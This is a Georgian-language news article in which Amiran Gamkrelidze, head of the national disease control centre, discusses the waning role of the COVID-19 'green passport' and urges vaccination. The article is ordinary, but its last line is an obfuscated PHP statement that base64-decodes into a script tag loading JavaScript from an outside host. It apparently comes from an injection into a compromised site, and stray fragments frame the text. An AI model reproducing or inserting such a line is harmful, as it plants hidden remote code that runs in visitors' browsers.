celsiusi
ავერსი შნაიდერი
დაავადებათა კონტროლისა და საზოგადოებრივი ჯანმრთელობის ეროვნული ცენტრის ხელმძღვანელის ამირან გამყრელიძის შეფასებით, „მწვანე პასპორტი“ დღეს დიდ როლს აღარ თამაშობს ეპიდსაწინააღმდეგო ღონისძიებებში, მაგრამ დისციპლინის ერთ-ერთი მთავარი იარაღია. მან ჟურნალისტებთან არ დააკონკრეტა, უჭერს თუ არა მხარს პირადად ე.წ. მწვანე პასპორტის გაუქმებას, თუმცა, აღნიშნა, რომ ამ საკითხზე საკოორდინაციო საბჭოზე დისკუსია იყო.
 
„მიუხედავად იმისა, რომ სოციალურ ქსელში საუბარი იყო თერმოსკრინიგის გაუქმებაზეც, დაავადებათა კონტროლის ცენტრს მიაჩნია, რომ ეს არის დისციპლინის და წესრიგის ერთ-ერთი მთავარი იარაღი დღეს, რომელიც პანდემიასთან ბრძოლის დროს მნიშვნელოვანია. მიუხედავად იმისა, რომ ვაცნობიერებ „მწვანე პასპორტი“ დღეს დიდ როლს უკვე არ თამაშობს ეპიდსაწინააღმდეგო ღონისძიებებში, დაავადებათა კონტროლის ცენტრს თავისი პოზიცია ჰქონდა, რომელიც საბჭოზე დააფიქსირა. არ აქვს მნიშვნელობა, ვეთანხმებოდი თუ არა. კიდევ ერთხელ გეუბნებით, საბჭოს შიდა დისკუსიები გარეთ არ გამომაქვს. საბჭოზე ამასთან დაკავშირებით დისკუსია იყო, დაავადებათა კონტროლის ცენტრმა თავისი პოზიცია დაფიქსირა. საბჭო გადაწყვეტილებას კონსენსუსის პრინციპით იღებს. ჭორაობას ვერ დავიწყებ, ჩემ თავს სერიოზულ ადამიანად მივიჩნევ“, - განაცხადა გამყრელიძემ.
 
კითხვაზე, წაახალისებს თუ არა ეს გადაწყვეტილება ანტივაქსერებს, ამირან გამყრელიძემ განმარტა, რომ „მწვანე პასპორტი“ ვაქცინაციის სტიმულირებისთვის ერთ-ერთი მეთოდი იყო და ამ მიმართულებით კიდევ ბევრი დარჩა.
 
„ვაქცინაცია და აცრები პანდემიასთან ბრძოლის მთავარი იარაღი გახლავთ, ამას აფიქსირებს საბჭო. პანდემის შეჩერების მთავარი გზა ვაქცინაციაზე გადის. ამიტომ კიდევ ერთხელ ყველას უნდა მოვუწოდოთ, იქნება „მწვანე პაპსორტი“ დაშვებული თუ არა, წავიდნენ და აიცრან“,-განაცხადა გამყრელიძემ.
 
რაც შეეხება საქართველოში შემოსვლის საკითხს, ამირან გამყრელიძის განმარტებით, ამ შემთხვევაში, „მწვანე პასპორტი“ კვლავ იმუშავებს.
 
„მწვანე პასპორტი“ იმუშავებს ყველგან, ვისაც უნდა მოგზაურობა, წასვლა და აშ. ქვეყანაში შემოსვლასთან დაკავშირებით დღეს არაფერი შეცვლილა“, - განმარტა გამყრელიძემ.
783
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");